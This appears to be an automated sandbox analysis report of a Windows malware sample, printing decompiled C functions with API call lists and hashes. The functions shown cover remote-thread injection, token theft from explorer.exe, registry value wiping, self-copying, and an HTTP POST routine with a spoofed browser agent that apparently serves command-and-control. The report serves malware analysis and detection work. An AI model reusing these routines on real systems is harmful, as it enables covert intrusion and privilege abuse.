				PostThreadMessageA( *0x1d5088, 0x12, 0, 0);
				WaitForSingleObject( *0x1d5000, 0x7530);
				CloseHandle( *0x1d5000);
				 *0x1d5000 = 0;
				_t25 = E001D37D0(0x1e, 0,  &_v8);
				_t46 =  *0x1d5049; // 0x0
				_t11 =  *_t25;
				if(_t46 != 0) {
					L3:
					if((_t11 & 0x00000004) == 0) {
						goto L5;
					}
					_t27 = E001D37D0(0x28, 0,  &_v8);
					_t39 =  *0x1d5074; // 0x0
					 *((char*)(_t27 + 2)) =  *_t39 - 1;
					_t12 = 0;
					goto L15;
				}
				_t47 =  *0x1d50bc; // 0x0
				if(_t47 == 0) {
					goto L5;
				}
				goto L3;
			}

APIs

PostThreadMessageA.USER32(00000012,00000000,00000000), ref: 001D147F
WaitForSingleObject.KERNEL32(00007530), ref: 001D1490
CloseHandle.KERNEL32 ref: 001D149C
CreateThread.KERNEL32(00000000,00000000,001D36F3,00000000,00000000,001D5088), ref: 001D1592

Memory Dump Source

Source File: 00000001.00000002.260105408.001D1000.00000020.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000001.00000002.260098942.001D0000.00000002.sdmp
Associated: 00000001.00000002.260113910.001D5000.00000004.sdmp
Associated: 00000001.00000002.260121138.001D7000.00000002.sdmp

Function 001D1F4E, Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 79 Total matches: 6
string

Similarity

Total matches: 6
API ID: lstrcpy
String ID: ($TagId
API String ID: 3722407311-2515966560
Opcode ID: dbc64af6430ca1c5886ade0b967d05941ebfb9057e984414971c4070ddfe475d
Instruction ID: fa5cba4715d104d4c09d20bb5c144b14be78e5e3a72b22bd9689641a04f682e3
Opcode Fuzzy Hash: FCF05C45404DB79BC52710821517B2E20D2AF46B8EC4233726635F6ECC0DD17008BF0D
Instruction Fuzzy Hash: fa5cba4715d104d4c09d20bb5c144b14be78e5e3a72b22bd9689641a04f682e3

C-Code - Quality: 59%

			E001D1F4E(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t52;
				signed int _t57;
				signed int _t61;
				intOrPtr _t63;
				void* _t64;

				_push(0x44);
				_push(0x1d1390);
				E001D1637(__ebx, __edi, __esi);
				_t63 =  *((intOrPtr*)(_t64 + 8));
				_t61 = 0;
				_t57 = 0;
				 *(_t64 - 4) = 0;
				while(1) {
					_push(0);
					_push(0);
					_push(_t64 - 0x20);
					_push( *((intOrPtr*)(_t63 + 0x3c60)));
					if( *((intOrPtr*)(_t63 + 0x3c80))() == 0 ||  *((intOrPtr*)(_t64 - 0x20)) == 0) {
						break;
					}
					_t52 =  *((intOrPtr*)(_t64 + 0x10)) - _t61;
					 *((intOrPtr*)(_t64 - 0x24)) = _t52;
					if(_t52 >  *((intOrPtr*)(_t64 - 0x20))) {
						_t52 =  *((intOrPtr*)(_t64 - 0x20));
						 *((intOrPtr*)(_t64 - 0x24)) = _t52;
					}
					_push(_t64 - 0x1c);
					_push(_t52);
					_push( *((intOrPtr*)(_t64 + 0xc)) + _t61);
					_push( *((intOrPtr*)(_t63 + 0x3c60)));
					if( *((intOrPtr*)(_t63 + 0x3c84))() != 0 &&  *((intOrPtr*)(_t64 - 0x1c)) != 0) {
						_t61 = _t61 +  *((intOrPtr*)(_t64 - 0x1c));
						 *(_t64 - 0x28) = _t61;
						continue;
					}
					break;
				}
				 *( *(_t64 + 0x14)) = _t61;
				if(_t61 != 0) {
					lstrcpyA(_t64 - 0x54, "TagId");
					 *((intOrPtr*)(_t64 - 0x1c)) = 0x28;
					_push(0);
					_push(_t64 - 0x1c);
					_push(_t64 - 0x54);
					_push(0xffff);
					_push( *((intOrPtr*)(_t63 + 0x3c60)));
					if( *((intOrPtr*)(_t63 + 0x3c88))() != 0) {
						lstrcpyA(_t63 + 0x3cb0, _t64 - 0x54);
					}
					_t57 = E001D1603( *((intOrPtr*)(_t64 + 0xc)), _t61);
					 *(_t64 - 0x2c) = _t57;
				}
				 *(_t64 - 4) =  *(_t64 - 4) | 0xffffffff;
				if(_t57 == 0) {
					 *(_t63 + 0x5c) =  *(_t63 + 0x5c) & 0x000000fb;
					 *( *(_t64 + 0x14)) =  *( *(_t64 + 0x14)) & _t57;
				}
				return E001D173E(_t57);
			}

APIs

lstrcpyA.KERNEL32(?,TagId), ref: 001D1FD6
lstrcpyA.KERNEL32(?,?), ref: 001D2009

Strings

(, xrefs: 001D1FD8
TagId, xrefs: 001D1FC7

Memory Dump Source

Source File: 00000001.00000002.260105408.001D1000.00000020.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000001.00000002.260098942.001D0000.00000002.sdmp
Associated: 00000001.00000002.260113910.001D5000.00000004.sdmp
Associated: 00000001.00000002.260121138.001D7000.00000002.sdmp

Function 001D3020, Relevance: 6.0, APIs: 4, Instructions: 50 Total matches: 3
threadinjection

Similarity

Total matches: 3
API ID: CloseHandleCreateRemoteThreadGetExitCodeThreadWaitForMultipleObjects
String ID:
API String ID: 3598368018-0
Opcode ID: 02c1a043345bfcf4915c21911e954b3d5073dba7e642fc22e378a39fa225183a
Instruction ID: 6812434df433a10a49eb64cdae1d93602e3d9f75bbdf674f19957a85cb12a94c
Opcode Fuzzy Hash: 3BD0A900CE2DC9B876631047996CB73E2009F121CA98C378A32D90CB088B2E3038E341
Instruction Fuzzy Hash: 6812434df433a10a49eb64cdae1d93602e3d9f75bbdf674f19957a85cb12a94c

C-Code - Quality: 33%

			E001D3020(void* __ecx, void* _a4, _Unknown_base(*)()* _a8, void* _a12, intOrPtr _a16, DWORD* _a20, intOrPtr _a24) {
				intOrPtr _v8;
				struct _SECURITY_ATTRIBUTES* _v12;
				int _t13;
				DWORD* _t18;
				intOrPtr _t22;

				_t18 = _a20;
				_t22 = _a16;
				_v12 = 0;
				_v8 = _t22;
				 *_t18 = 0;
				_t13 = CreateRemoteThread(_a4, 0, 0, _a8, _a12, 0, 0);
				_v12 = _t13;
				if(_t13 != 0) {
					if(_a24 != 0) {
						_push(0xffffffff);
						_push(0);
						_push( &_v12);
						if(_t22 == 0) {
							_push(1);
						} else {
							_push(2);
						}
						if(WaitForMultipleObjects() == 0) {
							GetExitCodeThread(_v12, _t18);
						}
					} else {
						 *_t18 = 1;
					}
					_t13 = CloseHandle(_v12);
				}
				return _t13;
			}

APIs

CreateRemoteThread.KERNEL32(?,00000000,00000000,?,001D2421,00000000,00000000), ref: 001D3045
WaitForMultipleObjects.KERNEL32(00000001,?,00000000,000000FF), ref: 001D3070
GetExitCodeThread.KERNEL32(?,?,?,?,?,001D36DB,?,00000000,001D2421,00000000,00000001,?,?,001D31F9,?,?), ref: 001D307E
CloseHandle.KERNEL32(?), ref: 001D3087

Memory Dump Source

Source File: 00000001.00000002.260105408.001D1000.00000020.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000001.00000002.260098942.001D0000.00000002.sdmp
Associated: 00000001.00000002.260113910.001D5000.00000004.sdmp
Associated: 00000001.00000002.260121138.001D7000.00000002.sdmp

Function 001D35DB, Relevance: 6.0, APIs: 4, Instructions: 45 Total matches: 6
registry

Similarity

Total matches: 6
API ID: RegCloseKeyRegDeleteValueRegEnumValueRegOpenKeyEx
String ID:
API String ID: 2802766549-0
Opcode ID: e8b56a8720ee6e3ece2d4dc4a7345ea2c28f84232851412fee7266dde94396d7
Instruction ID: bfb9062b6176546c74d883c13d9a210422831c3169cc6c7731f438f327b3575d
Opcode Fuzzy Hash: 15D0A982DC09873A2B430048AA3D7E8E072FA502C08ACA3F234800AE568F4F3008CF52
Instruction Fuzzy Hash: bfb9062b6176546c74d883c13d9a210422831c3169cc6c7731f438f327b3575d

C-Code - Quality: 100%

			E001D35DB() {
				void* _v8;
				int _v12;
				char _v44;
				long _t10;
				int _t18;

				_t10 = RegOpenKeyExA(0x80000002,  *0x1d5004, 0, 0xf003f,  &_v8);
				if(_t10 == 0) {
					_t18 = 0x20;
					while(1) {
						_v12 = _t18;
						if(RegEnumValueA(_v8, 0,  &_v44,  &_v12, 0, 0, 0, 0) != 0) {
							break;
						}
						RegDeleteValueA(_v8,  &_v44);
					}
					return RegCloseKey(_v8);
				}
				return _t10;
			}

0x001d35f9
0x001d3601
0x001d360d
0x001d361d
0x001d362d
0x001d3634
0x00000000
0x00000000
0x001d3617
0x001d3617
0x00000000
0x001d3640
0x001d3643

APIs

RegOpenKeyExA.ADVAPI32(80000002,00000000,000F003F,?,00000000), ref: 001D35F9
RegDeleteValueA.ADVAPI32(?,?,?,00000002), ref: 001D3617
RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,00000002), ref: 001D3630
RegCloseKey.ADVAPI32(?,?,00000002), ref: 001D3639

Memory Dump Source

Source File: 00000001.00000002.260105408.001D1000.00000020.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000001.00000002.260098942.001D0000.00000002.sdmp
Associated: 00000001.00000002.260113910.001D5000.00000004.sdmp
Associated: 00000001.00000002.260121138.001D7000.00000002.sdmp

Function 001D1ABC, Relevance: 6.0, APIs: 4, Instructions: 28 Total matches: 6
synchronizationthread

Similarity

Total matches: 6
API ID: CloseHandleLocalFreeTerminateThreadWaitForSingleObject
String ID:
API String ID: 1487171737-0
Opcode ID: 113accf1a247a85ca4628c88750f0cdfece1ea245e894959ebf4d1c2d30c192f
Instruction ID: 41ff6f16ac9ee2ff72b6e11d6e7bca6878d0baa93780668c194bfac74e4ec8cf
Opcode Fuzzy Hash: 3ED0228D802F0BD0CC5B5047AF2E3320106AB40BDAE1C89703290414816F1FE067EF8D
Instruction Fuzzy Hash: 41ff6f16ac9ee2ff72b6e11d6e7bca6878d0baa93780668c194bfac74e4ec8cf

C-Code - Quality: 100%

			E001D1ABC(void* _a4, intOrPtr _a8) {
				void* _t6;
				void* _t8;
				void* _t14;

				_t14 = _a4;
				if(_t14 != 0) {
					if(_a8 != 0) {
						E001D1E27(_t14, 0x7fffffff);
					}
					E001D1DD4(_t14);
					_t8 =  *(_t14 + 0x3ba4);
					if(_t8 != 0) {
						if(WaitForSingleObject(_t8, 0x1388) == 0x102) {
							TerminateThread( *(_t14 + 0x3ba4), 0);
						}
						CloseHandle( *(_t14 + 0x3ba4));
					}
					return LocalFree(_t14);
				}
				return _t6;
			}

0x001d1abd
0x001d1ac3
0x001d1aca
0x001d1ad2
0x001d1ad2
0x001d1ad8
0x001d1add
0x001d1ae5
0x001d1af8
0x001d1b02
0x001d1b02
0x001d1b0e
0x001d1b0e
0x00000000
0x001d1b15
0x001d1b1c

APIs

WaitForSingleObject.KERNEL32(?,00001388), ref: 001D1AED
TerminateThread.KERNEL32(?,00000000), ref: 001D1B02
CloseHandle.KERNEL32(?), ref: 001D1B0E
LocalFree.KERNEL32(?,?), ref: 001D1B15

Part of subcall function 001D1E27: GetMessageA.USER32(?,00000000,00000000,00000000), ref: 001D1E4D
Part of subcall function 001D1E27: TranslateMessage.USER32(?), ref: 001D1E74
Part of subcall function 001D1E27: DispatchMessageA.USER32(?), ref: 001D1E7E

Memory Dump Source

Source File: 00000001.00000002.260105408.001D1000.00000020.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000001.00000002.260098942.001D0000.00000002.sdmp
Associated: 00000001.00000002.260113910.001D5000.00000004.sdmp
Associated: 00000001.00000002.260121138.001D7000.00000002.sdmp

Process Name: x2f5mqUHUN.exe Analysis ID: 57817

General

Root Process Name:	P8Wo4avJbj.exe
Process MD5:	F391556D9F89499FA8EE757CB3472710
Total matches:	84
Initial Analysis Report:	Open
Initial sample Analysis ID:	57817
Initial sample SHA 256:	060448FFD71FE2EDBB5FE7C6298AD2B077E57FA6ED6D4250FBD799DD85488843
Initial sample name:	x2f5mqUHU.exe

Similar Executed Functions

Function 00402B08, Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 88 Total matches: 6
stringfile

Similarity

Total matches: 6
API ID: lstrcpy$CloseHandleCopyFileCreateFileGetModuleFileNameSetFilePointerWriteFilelstrcmpilstrlen
String ID: dll$exe
API String ID: 1827060118-2048111982
Opcode ID: c3885fe13371a926e81591ffe00ebdc536067f9240e3e9512f9da992c1313499
Instruction ID: 57b1cbd0d537261b9f72dfb42b8f065b65fb383f86c9acaf781157f8dac982d0
Opcode Fuzzy Hash: 52F0E98E0D8E83C5D466A3477C95BF311417742D9AD4D97B079D97298F6F12A208EF04
Instruction Fuzzy Hash: 57b1cbd0d537261b9f72dfb42b8f065b65fb383f86c9acaf781157f8dac982d0

C-Code - Quality: 100%

			E00402B08(long _a4, void _a8) {
				CHAR* _v8;
				char _v268;
				long _t20;
				int _t23;
				int _t24;
				struct HINSTANCE__* _t27;
				void _t30;
				CHAR* _t36;
				long _t42;
				CHAR* _t44;
				void* _t46;

				_t20 = GetModuleFileNameA( *0x405044,  &_v268, 0x104);
				if(_t20 == 0) {
					return _t20;
				}
				_v8 = "dll";
				if(_a8 != 0) {
					_v8 = "exe";
				}
				_t44 = _a4;
				lstrcpyA(_t44,  &_v268);
				_t23 = lstrlenA(_t44);
				_t9 = _t44 - 3; // -3
				_t36 = _t23 + _t9;
				_t24 = lstrcmpiA(_t36, _v8); // executed
				if(_t24 != 0) {
					lstrcpyA(_t36, _v8);
					_t24 = CopyFileA( &_v268, _t44, 0); // executed
					if(_t24 != 0) {
						_t24 = CreateFileA(_t44, 0xc0000000, 3, 0, 3, 0, 0); // executed
						_t46 = _t24;
						if(_t46 != 0xffffffff) {
							_t27 =  *0x405044; // 0x400000
							_t12 = _t27 + 0x3c; // 0xa8
							_t42 =  *_t12 + _t27 - _t27 + 0x16;
							_a4 = _t42;
							if(_a8 != 0) {
								_t30 = 0;
							} else {
								_t30 = 0x2000;
							}
							_a8 = _t30;
							SetFilePointer(_t46, _t42, 0, 0); // executed
							WriteFile(_t46,  &_a8, 2,  &_a4, 0); // executed
							_t24 = CloseHandle(_t46);
						}
					}
				}
				return _t24;
			}

APIs

GetModuleFileNameA.KERNEL32(?,00000104), ref: 00402B23
lstrcpyA.KERNEL32(?,?,00000044,00000000,76E1EA18), ref: 00402B59
lstrlenA.KERNEL32(?), ref: 00402B5C
lstrcmpi.KERNEL32(-00000003,004011C8), ref: 00402B6A
lstrcpyA.KERNEL32(-00000003,004011C8), ref: 00402B7C
CopyFileA.KERNEL32(?,?,00000000), ref: 00402B89
CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 00402BA0
SetFilePointer.KERNELBASE(00000000,00000092,00000000,00000000), ref: 00402BDF
WriteFile.KERNEL32(00000000,00000000,00000002,?,00000000), ref: 00402BF1
CloseHandle.KERNEL32(00000000), ref: 00402BF8

Strings

exe, xrefs: 00402B3E
dll, xrefs: 00402B35

Memory Dump Source

Source File: 00000001.00000002.260180009.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.260173827.00400000.00000002.sdmp
Associated: 00000001.00000002.260188653.00405000.00000004.sdmp
Associated: 00000001.00000002.260196655.00407000.00000002.sdmp

Function 00403358, Relevance: 18.1, APIs: 12, Instructions: 103 Total matches: 6
synchronizationthread

Similarity

Total matches: 6
API ID: CloseHandle$WaitForSingleObject$CreateEventCreateThreadExitProcessGetStdHandleGetVersionSetStdHandle
String ID:
API String ID: 4158509741-0
Opcode ID: 2ad7749c4b6b29532a42bdd3babab8e75ff4bd89d39d064bb05a7080b22e26a8
Instruction ID: 1f66a28011c897b0d121599fcf6742e47d01aa91f08c6217b59ea673e7e77bb8
Opcode Fuzzy Hash: 1FF02D8822485981C46BAD007CF4FB125448B1765FD98B7143F6D7816F3785B1457F9A
Instruction Fuzzy Hash: 1f66a28011c897b0d121599fcf6742e47d01aa91f08c6217b59ea673e7e77bb8

C-Code - Quality: 96%

			E00403358() {
				long _v4;
				void* _v8;
				long _t8;
				void* _t10;
				void* _t11;
				void* _t17;
				intOrPtr _t23;
				intOrPtr _t26;
				signed int _t27;
				void* _t30;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t36;
				intOrPtr _t42;

				_t8 = GetVersion();
				_t42 =  *0x4050b0; // 0x0
				 *0x405070 = _t8;
				if(_t42 == 0 && _t8 < 0) {
					 *0x40506c =  *0x40506c | 0xffffffff;
				}
				_push(_t31);
				_v8 = GetStdHandle(0xfffffff4);
				_t10 = E00402A43(); // executed
				_t36 = _t10;
				if(_t36 == 0) {
					L10:
					_t11 =  *0x40506c; // 0x0
					__eflags = _t11;
					if(_t11 != 0) {
						__eflags = _t11 - 2;
						if(_t11 == 2) {
							L22:
							if(_v8 != 0) {
								CloseHandle(_v8);
							}
							ExitProcess(0);
						}
						__eflags = _t36;
						if(_t36 != 0) {
							L16:
							 *0x4050c8 = CreateEventA(0, 0, 0, 0);
							L17:
							_t33 = CreateThread(0, 0, E00402C05, 0, 0,  &_v4);
							__eflags = _t33;
							if(_t33 != 0) {
								_t17 =  *0x4050c8; // 0x0
								__eflags = _t17;
								if(_t17 != 0) {
									WaitForSingleObject(_t17, 0xffffffff);
									CloseHandle( *0x4050c8);
									 *0x4050c8 = 0;
								}
								WaitForSingleObject(_t33, 0xffffffff);
								CloseHandle(_t33);
							}
							L21:
							E00402FA0(_t30, 0);
							goto L22;
						}
						__eflags = _t11 - 0xffffffff;
						if(_t11 != 0xffffffff) {
							goto L17;
						}
						goto L16;
					}
					__eflags = _t36;
					if(_t36 != 0) {
						goto L16;
					}
					E00401626();
					goto L22;
				}
				_t23 =  *0x4050b4; // 0x1d6000
				 *0x405048 = 0;
				_t46 =  *((intOrPtr*)(_t23 + 0x28));
				if( *((intOrPtr*)(_t23 + 0x28)) != 0) {
					 *0x40506c = 1;
					SetStdHandle(0xfffffff6, _v8);
					goto L10;
				}
				 *0x40506c = 2;
				_t34 = E00402DE5(0, _t31, _t36, _t46);
				_t26 =  *0x4050b4; // 0x1d6000
				 *(_t26 + 0x28) = 1;
				_t27 = E00403094(0, _t30, _t34, _t36, _t46, _t34);
				asm("sbb esi, esi");
				_t36 = 1 +  ~_t27;
				if(_t34 != 0) {
					CloseHandle(_t34);
				}
				if(_t36 != 0) {
					goto L10;
				} else {
					goto L21;
				}
			}

APIs

GetVersion.KERNEL32 ref: 0040335C
GetStdHandle.KERNEL32(000000F4), ref: 00403380

Part of subcall function 00402A43: LoadLibraryA.KERNEL32(?), ref: 00402A6F
Part of subcall function 00402A43: GetCurrentProcessId.KERNEL32 ref: 00402AA1

SetStdHandle.KERNEL32(000000F6,?), ref: 004033F5

Part of subcall function 00402DE5: LoadLibraryA.KERNEL32(ntdll.dll), ref: 00402E03
Part of subcall function 00402DE5: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation,?,?,?,?,?,?,?,?,00401448,00000028), ref: 00402E22
Part of subcall function 00402DE5: GetProcAddress.KERNEL32(00000000,_wcsicmp,?,?,?,?,?,?,?,?,00401448,00000028), ref: 00402E35
Part of subcall function 00402DE5: LocalAlloc.KERNEL32(00000040,00010000,?,?,?,?,?,?,?,?,00401448,00000028), ref: 00402E4A
Part of subcall function 00402DE5: LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,00401448,00000028), ref: 00402E6D
Part of subcall function 00402DE5: OpenProcess.KERNEL32(00000410,00000000,?,?,?,?,?,?,?,00401448,00000028), ref: 00402EAC
Part of subcall function 00402DE5: OpenProcessToken.ADVAPI32(00000000,000200FF,?,?,?,?,?,?,?,00401448,00000028), ref: 00402EC5
Part of subcall function 00402DE5: CloseHandle.KERNEL32(00000000), ref: 00402ECC
Part of subcall function 00402DE5: FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,00401448,00000028), ref: 00402EF5
Part of subcall function 00402DE5: LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,00401448,00000028), ref: 00402F04

Part of subcall function 00403094: GetCurrentProcessId.KERNEL32(00401410,00000184,00403308,00000000,00000001,00000113,?,?,00402421), ref: 004030B4
Part of subcall function 00403094: OpenProcess.KERNEL32(001F0FFF,00000001,00000000,?,?,00402421), ref: 004030C1
Part of subcall function 00403094: DuplicateTokenEx.ADVAPI32(?,02000000,00000000,00000000,00000001,00000000,?,00000104), ref: 00403151
Part of subcall function 00403094: SetTokenInformation.ADVAPI32(00000000,0000000C,?,00000004), ref: 00403169
Part of subcall function 00403094: CreateProcessAsUserA.ADVAPI32(?,00000000,?,00000000,00000000,00000001,00000004,00000000,00000000,?,?), ref: 00403197
Part of subcall function 00403094: CloseHandle.KERNEL32(00000000), ref: 004031A8
Part of subcall function 00403094: CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,?,00000000,00000000,?,?), ref: 004031C8
Part of subcall function 00403094: TerminateProcess.KERNEL32(?,00000000,?,?,00000000,?,00000000), ref: 0040322D
Part of subcall function 00403094: CloseHandle.KERNEL32(?), ref: 00403236
Part of subcall function 00403094: CloseHandle.KERNEL32(?), ref: 00403247
Part of subcall function 00403094: CreateThread.KERNEL32(00000000,00000000,Function_00002965,?,00000000,?), ref: 0040326D
Part of subcall function 00403094: SetStdHandle.KERNEL32(000000F6,00000000), ref: 0040327B

CloseHandle.KERNEL32(00000000), ref: 004033DA
ExitProcess.KERNEL32 ref: 00403485

Part of subcall function 00401626: StartServiceCtrlDispatcherA.ADVAPI32(00405034,0040340D), ref: 0040162B

CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00403421
CreateThread.KERNEL32(00000000,00000000,Function_00002C05,00000000,00000000,?), ref: 0040343A
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00403458
CloseHandle.KERNEL32 ref: 00403460
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0040346B
CloseHandle.KERNEL32(00000000), ref: 0040346E
CloseHandle.KERNEL32(?), ref: 00403482

Memory Dump Source

Source File: 00000001.00000002.260180009.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.260173827.00400000.00000002.sdmp
Associated: 00000001.00000002.260188653.00405000.00000004.sdmp
Associated: 00000001.00000002.260196655.00407000.00000002.sdmp

Similar Non-Executed Functions

Function 001D2DE5, Relevance: 24.6, APIs: 10, Strings: 4, Instructions: 96 Total matches: 6
libraryloadermemory

Similarity

Total matches: 6
API ID: GetProcAddressLocalFree$CloseHandleFreeLibraryLoadLibraryLocalAllocOpenProcessOpenProcessToken
String ID: NtQuerySystemInformation$_wcsicmp$[FILE]$[FILE]
API String ID: 871439847-2760969069
Opcode ID: 79303f3461f55357ea3caebb2c463ba2263ea78e754b615967e539c6771ee5b5
Instruction ID: d143e7d7f0a7e528b80bb3ef837344cc21e5cd4fbee9c201c5a4592c151db2c3
Opcode Fuzzy Hash: 48F04686904A97F1E623B9C8196D36164553FA17C8E0D8631B21038912B7AF322A7F80
Instruction Fuzzy Hash: d143e7d7f0a7e528b80bb3ef837344cc21e5cd4fbee9c201c5a4592c151db2c3

C-Code - Quality: 96%

			E001D2DE5(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				_Unknown_base(*)()* _t36;
				_Unknown_base(*)()* _t37;
				void* _t38;
				intOrPtr _t40;
				void _t41;
				int _t42;
				struct HINSTANCE__* _t49;
				void* _t50;
				long _t54;
				void* _t58;
				void* _t59;
				void* _t60;

				_push(0x28);
				_push(0x1d1448);
				E001D1637(__ebx, __edi, __esi);
				 *(_t60 - 0x1c) =  *(_t60 - 0x1c) & 0x00000000;
				_t54 = 0x10000;
				 *(_t60 - 0x24) =  *(_t60 - 0x24) & 0x00000000;
				_t49 = LoadLibraryA("ntdll.dll");
				 *(_t60 - 0x20) = _t49;
				if(_t49 == 0) {
					L17:
					if( *(_t60 - 0x20) != 0) {
						FreeLibrary( *(_t60 - 0x20));
					}
					if( *(_t60 - 0x1c) != 0) {
						LocalFree( *(_t60 - 0x1c));
					}
					return E001D173E( *(_t60 - 0x24));
				}
				_t36 = GetProcAddress(_t49, "NtQuerySystemInformation");
				 *(_t60 - 0x28) = _t36;
				if(_t36 == 0) {
					goto L17;
				}
				_t37 = GetProcAddress(_t49, "_wcsicmp");
				 *(_t60 - 0x2c) = _t37;
				if(_t37 == 0) {
					goto L17;
				}
				while(1) {
					_t38 = LocalAlloc(0x40, _t54);
					 *(_t60 - 0x1c) = _t38;
					if(_t38 == 0) {
						goto L17;
					}
					_t50 =  *(_t60 - 0x28)(5, _t38, _t54, 0);
					if(_t50 != 0xc0000004) {
						if(_t50 < 0) {
							goto L17;
						}
						L8:
						if(_t50 == 0xc0000004) {
							continue;
						}
						_t58 =  *(_t60 - 0x1c);
						 *(_t60 - 4) =  *(_t60 - 4) & 0x00000000;
						while(1) {
							_t40 =  *((intOrPtr*)(_t58 + 0x3c));
							 *((intOrPtr*)(_t60 - 0x30)) = _t40;
							if(_t40 == 0) {
								goto L14;
							}
							_t42 =  *(_t60 - 0x2c)(_t40, L"explorer.exe");
							if(_t42 != 0) {
								goto L14;
							}
							_t59 = OpenProcess(0x410, _t42,  *(_t58 + 0x44));
							 *(_t60 - 0x34) = _t59;
							if(_t59 != 0) {
								OpenProcessToken(_t59, 0x200ff, _t60 - 0x24);
								CloseHandle(_t59);
							}
							L16:
							 *(_t60 - 4) =  *(_t60 - 4) | 0xffffffff;
							goto L17;
							L14:
							_t41 =  *_t58;
							if(_t41 == 0) {
								goto L16;
							}
							_t58 = _t58 + _t41;
							 *(_t60 - 0x38) = _t58;
						}
					}
					LocalFree( *(_t60 - 0x1c));
					 *(_t60 - 0x1c) =  *(_t60 - 0x1c) & 0x00000000;
					_t54 = _t54 + _t54;
					goto L8;
				}
				goto L17;
			}

APIs

LoadLibraryA.KERNEL32(ntdll.dll), ref: 001D2E03
GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation,?,?,?,?,?,?,?,?,001D1448,00000028), ref: 001D2E22
GetProcAddress.KERNEL32(00000000,_wcsicmp,?,?,?,?,?,?,?,?,001D1448,00000028), ref: 001D2E35
LocalAlloc.KERNEL32(00000040,00010000,?,?,?,?,?,?,?,?,001D1448,00000028), ref: 001D2E4A
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,001D1448,00000028), ref: 001D2E6D
OpenProcess.KERNEL32(00000410,00000000,?,?,?,?,?,?,?,001D1448,00000028), ref: 001D2EAC
OpenProcessToken.ADVAPI32(00000000,000200FF,?,?,?,?,?,?,?,001D1448,00000028), ref: 001D2EC5
CloseHandle.KERNEL32(00000000), ref: 001D2ECC
FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,001D1448,00000028), ref: 001D2EF5
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,001D1448,00000028), ref: 001D2F04

Strings

ntdll.dll, xrefs: 001D2DFE
_wcsicmp, xrefs: 001D2E2F
explorer.exe, xrefs: 001D2E94
NtQuerySystemInformation, xrefs: 001D2E16

Memory Dump Source

Source File: 00000001.00000002.260105408.001D1000.00000020.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000001.00000002.260098942.001D0000.00000002.sdmp
Associated: 00000001.00000002.260113910.001D5000.00000004.sdmp
Associated: 00000001.00000002.260121138.001D7000.00000002.sdmp

Function 001D2CC7, Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 112 Total matches: 5
libraryloader

Similarity

Total matches: 5
API ID: FreeLibraryGetProcAddressLoadLibraryinet_ntoawsprintf
String ID: N$%s: 0$Mozilla/4.0 (compatible; MSIE 6.0;)$POST$TagId$[FILE]
API String ID: 3761191649-3458657377
Opcode ID: 2aee25d4d97340da8d57a5187acebaa494bf19f8195fcf1f0a5fcee18dc65b62
Instruction ID: 5c5cc2a2a5d0c80c85ef90c9e54d4eb75811ab3963221f16da9f65b959107efc
Opcode Fuzzy Hash: 3CF04C85081F07F5FC33A941245D77DE780BF95AC2DCCF9155622D6A235A4D32189741
Instruction Fuzzy Hash: 5c5cc2a2a5d0c80c85ef90c9e54d4eb75811ab3963221f16da9f65b959107efc

C-Code - Quality: 94%

			E001D2CC7(_Unknown_base(*)()** _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr _a16) {
				char _v8;
				char _v40;
				signed int _t30;
				_Unknown_base(*)()* _t32;
				signed int _t34;
				signed int _t35;
				intOrPtr* _t36;
				signed int _t43;
				void* _t51;
				signed int* _t54;

				_v8 = 0x4e20;
				_t30 = LoadLibraryA("wininet.dll");
				_t54 = _a4;
				_t54[0xd] = _t30;
				if(_t30 != 0) {
					_a4 =  &(_t54[3]);
					_t51 = 0;
					while(1) {
						_t6 = _t51 + 0x1d500c; // 0x1d12c8
						_t32 = GetProcAddress(_t54[0xd],  *_t6);
						 *_a4 = _t32;
						if(_t32 == 0) {
							break;
						}
						_a4 =  &(_a4[1]);
						_t51 = _t51 + 4;
						if(_t51 < 0x28) {
							continue;
						}
						_t35 = _t54[3]("Mozilla/4.0 (compatible; MSIE 6.0;)", 0, 0, 0, 0);
						 *_t54 = _t35;
						if(_t35 != 0) {
							if(_a16 != 0) {
								_t36 = _a12;
								_push( *_t36);
								L001D3826();
							} else {
								_t36 = _a8;
							}
							_t35 = _t54[4]( *_t54, _t36, 0x50, 0x1d1369, 0x1d1369, 3, 0, 0);
							_t54[1] = _t35;
							if(_t35 == 0) {
								goto L6;
							} else {
								_t35 = _t54[9](_t35, "POST", 0x1d1369, 0, 0, 0, 0x84400100, 0);
								_t54[2] = _t35;
								if(_t35 == 0) {
									goto L6;
								}
								_t54[5](_t35, 2,  &_v8, 4);
								_t54[5](_t54[2], 5,  &_v8, 4);
								wsprintfA( &_v40, "%s: 0\r\n", "TagId");
								_t43 = _t54[7](_t54[2],  &_v40, 0xffffffff, 0, 0);
								asm("sbb eax, eax");
								_t34 = ( ~_t43 & 0x00000002) - 1;
								L14:
								return _t34;
							}
						}
						L6:
						_t34 = _t35 | 0xffffffff;
						goto L14;
					}
					FreeLibrary(_t54[0xd]);
					_t54[0xd] = 0;
					_t34 = 0;
